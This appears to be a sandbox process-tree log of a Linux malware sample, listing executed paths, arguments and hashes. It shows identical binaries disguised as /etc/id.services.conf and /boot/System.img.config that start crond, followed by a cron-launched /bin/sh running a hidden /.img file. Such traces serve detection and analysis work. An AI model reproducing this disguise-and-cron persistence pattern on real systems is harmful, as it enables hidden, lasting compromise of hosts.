                                                                                                                    Path:/usr/bin/basename
                                                                                                                    Arguments:basename /usr/sbin/service
                                                                                                                    File size:39256 bytes
                                                                                                                    MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/systemctl
                                                                                                                    Arguments:systemctl --quiet is-active multi-user.target
                                                                                                                    File size:996584 bytes
                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/systemctl
                                                                                                                    Arguments:systemctl list-unit-files --full --type=socket
                                                                                                                    File size:996584 bytes
                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/sed
                                                                                                                    Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                                                                    File size:121288 bytes
                                                                                                                    MD5 hash:885062561f66aa1d4af4c54b9e7cc81a
                                                                                                                    Start time (UTC):23:11:25
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/systemctl
                                                                                                                    Arguments:systemctl start crond.service
                                                                                                                    File size:996584 bytes
                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/etc/id.services.conf
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366
                                                                                                                    Start time (UTC):23:11:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/etc/id.services.conf
                                                                                                                    Arguments:/etc/id.services.conf
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366
                                                                                                                    Start time (UTC):23:10:20
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/boot/System.img.config
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366
                                                                                                                    Start time (UTC):23:10:20
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:service crond start
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                    Start time (UTC):23:10:21
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                    Start time (UTC):23:10:21
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/basename
                                                                                                                    Arguments:basename /usr/sbin/service
                                                                                                                    File size:39256 bytes
                                                                                                                    MD5 hash:3283660e59f128df18bec9b96fbd4d41
                                                                                                                    Start time (UTC):23:10:21
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                    Start time (UTC):23:10:21
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/basename
                                                                                                                    Arguments:basename /usr/sbin/service
                                                                                                                    File size:39256 bytes
                                                                                                                    MD5 hash:3283660e59f128df18bec9b96fbd4d41
                                                                                                                    Start time (UTC):23:10:21
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                    Start time (UTC):23:10:21
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/systemctl
                                                                                                                    Arguments:systemctl --quiet is-active multi-user.target
                                                                                                                    File size:996584 bytes
                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                    Start time (UTC):23:10:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                    Start time (UTC):23:10:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                    Start time (UTC):23:10:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/systemctl
                                                                                                                    Arguments:systemctl list-unit-files --full --type=socket
                                                                                                                    File size:996584 bytes
                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                    Start time (UTC):23:10:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/service
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                    Start time (UTC):23:10:23
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/sed
                                                                                                                    Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                                                                    File size:121288 bytes
                                                                                                                    MD5 hash:885062561f66aa1d4af4c54b9e7cc81a
                                                                                                                    Start time (UTC):23:10:30
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/bin/systemctl
                                                                                                                    Arguments:systemctl start crond.service
                                                                                                                    File size:996584 bytes
                                                                                                                    MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                    Start time (UTC):23:10:20
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/boot/System.img.config
                                                                                                                    Arguments:-
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366
                                                                                                                    Start time (UTC):23:10:20
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/boot/System.img.config
                                                                                                                    Arguments:/boot/System.img.config
                                                                                                                    File size:5251072 bytes
                                                                                                                    MD5 hash:21ef8d4e6816e58f43beb0aee2422366
                                                                                                                    Start time (UTC):23:10:20
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/sshd
                                                                                                                    Arguments:-
                                                                                                                    File size:876328 bytes
                                                                                                                    MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340
                                                                                                                    Start time (UTC):23:10:20
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/sshd
                                                                                                                    Arguments:/usr/sbin/sshd -D -R
                                                                                                                    File size:876328 bytes
                                                                                                                    MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340
                                                                                                                    Start time (UTC):23:10:28
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/lib/udisks2/udisksd
                                                                                                                    Arguments:-
                                                                                                                    File size:483056 bytes
                                                                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24
                                                                                                                    Start time (UTC):23:10:28
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/dumpe2fs
                                                                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                                                                    File size:31112 bytes
                                                                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4
                                                                                                                    Start time (UTC):23:10:33
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/lib/systemd/systemd
                                                                                                                    Arguments:-
                                                                                                                    File size:1620224 bytes
                                                                                                                    MD5 hash:9b2bec7092a40488108543f9334aab75
                                                                                                                    Start time (UTC):23:10:33
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/cron
                                                                                                                    Arguments:/usr/sbin/cron -f
                                                                                                                    File size:55944 bytes
                                                                                                                    MD5 hash:2c82564ff5cc862c89392b061c7fbd59
                                                                                                                    Start time (UTC):23:11:01
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/cron
                                                                                                                    Arguments:-
                                                                                                                    File size:55944 bytes
                                                                                                                    MD5 hash:2c82564ff5cc862c89392b061c7fbd59
                                                                                                                    Start time (UTC):23:11:01
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/cron
                                                                                                                    Arguments:-
                                                                                                                    File size:55944 bytes
                                                                                                                    MD5 hash:2c82564ff5cc862c89392b061c7fbd59
                                                                                                                    Start time (UTC):23:11:01
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/bin/sh
                                                                                                                    Arguments:/bin/sh -c "/.img "
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                    Start time (UTC):23:11:01
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/bin/sh
                                                                                                                    Arguments:-
                                                                                                                    File size:129816 bytes
                                                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                    Start time (UTC):23:11:01
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/lib/systemd/systemd
                                                                                                                    Arguments:-
                                                                                                                    File size:1620224 bytes
                                                                                                                    MD5 hash:9b2bec7092a40488108543f9334aab75
                                                                                                                    Start time (UTC):23:11:01
                                                                                                                    Start date (UTC):20/03/2025
                                                                                                                    Path:/usr/sbin/cron
                                                                                                                    Arguments:/usr/sbin/cron -f
                                                                                                                    File size:55944 bytes
                                                                                                                    MD5 hash:2c82564ff5cc862c89392b061c7fbd59